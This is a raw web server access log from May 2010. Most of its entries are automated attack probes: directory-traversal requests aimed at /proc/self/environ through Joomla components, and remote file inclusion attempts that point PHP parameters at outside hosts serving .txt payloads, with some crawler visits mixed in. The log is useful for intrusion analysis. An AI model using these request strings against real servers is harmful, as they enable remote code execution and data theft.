94.23.9.198 - - [19/May/2010:02:28:23 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
178.32.3.34 - - [19/May/2010:02:28:30 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:28:30 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:28:31 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.195.112.180 - - [19/May/2010:02:28:41 -0500] "GET /logs/access_log.1213142400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.190.102.21 - - [19/May/2010:02:28:47 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:02:28:48 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:02:28:48 -0500] "GET /logs/access_log.1266710400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:02:28:51 -0500] "GET /logs/access_log.1264636800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
94.23.9.198 - - [19/May/2010:02:28:55 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:02:28:56 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:02:28:56 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
84.40.30.37 - - [19/May/2010:02:29:01 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:29:01 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 6151 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:29:02 -0500] "GET /logs/access_log.1268956800%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:29:27 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 6151 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:29:27 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:29:27 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:29:27 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:29:27 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 6151 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:29:28 -0500] "GET /logs/access_log.1268956800%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.108.70.32 - - [19/May/2010:02:29:38 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:02:29:39 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:02:29:40 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
84.40.30.37 - - [19/May/2010:02:29:45 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:29:47 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:29:48 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 6151 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:02:30:29 -0500] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.239 - - [19/May/2010:02:30:36 -0500] "GET /logs/access_log.1237334400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [19/May/2010:02:30:59 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.40.30.37 - - [19/May/2010:02:31:09 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:31:09 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:31:09 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 6151 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:31:26 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:31:26 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:02:31:26 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 6151 "-""Mozilla/5.0"
94.23.9.198 - - [19/May/2010:02:35:52 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:02:35:53 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:36:00 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:36:01 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:38:08 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:38:08 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:38:08 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:38:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:38:09 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:38:09 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:38:10 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:38:10 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:38:10 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:02:40:36 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:02:40:37 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:02:40:37 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:02:41:11 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.250.255.243 - - [19/May/2010:02:43:58 -0500] "GET /logs/access_log.1260576000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.54.63.138 - - [19/May/2010:02:45:19 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:45:23 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:45:31 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:02:45:37 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:02:45:37 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:02:45:38 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:02:46:03 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:02:46:03 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:46:04 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.14.124.80 - - [19/May/2010:02:46:13 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:02:46:23 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:46:24 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
178.32.3.34 - - [19/May/2010:02:46:28 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:46:28 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:46:28 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:46:30 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:02:47:25 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:02:47:25 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
89.108.70.32 - - [19/May/2010:02:48:24 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
202.72.242.242 - - [19/May/2010:02:49:15 -0500] "GET /logs//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:02:49:15 -0500] "GET //cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:02:49:15 -0500] "GET /logs/access_log.1263081600//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:02:49:28 -0500] "GET /logs/access_log.1263772800//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
74.54.63.138 - - [19/May/2010:02:49:48 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:49:48 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:49:49 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
213.92.118.159 - - [19/May/2010:02:50:17 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
213.92.118.159 - - [19/May/2010:02:50:17 -0500] "GET /logs/access_log.1268956800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
213.92.118.159 - - [19/May/2010:02:50:17 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.54.63.138 - - [19/May/2010:02:50:51 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
202.72.242.242 - - [19/May/2010:02:50:52 -0500] "GET /logs//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:02:50:52 -0500] "GET //cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:02:50:52 -0500] "GET /logs/access_log.1263081600//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:02:50:52 -0500] "GET /logs/access_log.1263772800//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
207.46.199.38 - - [19/May/2010:02:51:06 -0500] "GET / HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.72.242.242 - - [19/May/2010:02:51:32 -0500] "GET /logs/access_log.1265241600//delete_all.php?board_skin_path=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:02:51:32 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:02:51:32 -0500] "GET //delete_all.php?board_skin_path=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.54.63.138 - - [19/May/2010:02:52:04 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:52:06 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:52:15 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:52:16 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:02:52:17 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:52:19 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:02:52:19 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
70.38.71.147 - - [19/May/2010:02:52:21 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:02:52:22 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:02:52:25 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.13.54 - - [19/May/2010:02:55:36 -0500] "GET /logs/access_log.1242777600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:02:57:29 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.227 - - [19/May/2010:02:58:06 -0500] "GET /logs/access_log.1245715200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.38 - - [19/May/2010:02:58:06 -0500] "GET /logs/access_log.1167696000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.48 - - [19/May/2010:03:00:35 -0500] "GET /logs/access_log.1259020800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.92.118.159 - - [19/May/2010:03:01:56 -0500] "GET /logs/access_log.1268956800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
213.92.118.159 - - [19/May/2010:03:01:56 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
213.92.118.159 - - [19/May/2010:03:01:56 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
74.54.63.138 - - [19/May/2010:03:02:43 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:02:43 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:02:58 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:02:58 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:02:59 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:02:59 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
89.108.70.32 - - [19/May/2010:03:03:24 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:03:03:24 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
178.32.3.34 - - [19/May/2010:03:03:33 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:03:03:33 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:03:03:33 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:03:03:33 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.124.80 - - [19/May/2010:03:03:35 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.14.124.80 - - [19/May/2010:03:03:36 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:03:03:43 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:03:03:44 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:03:03:46 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:03:47 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:03:59 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
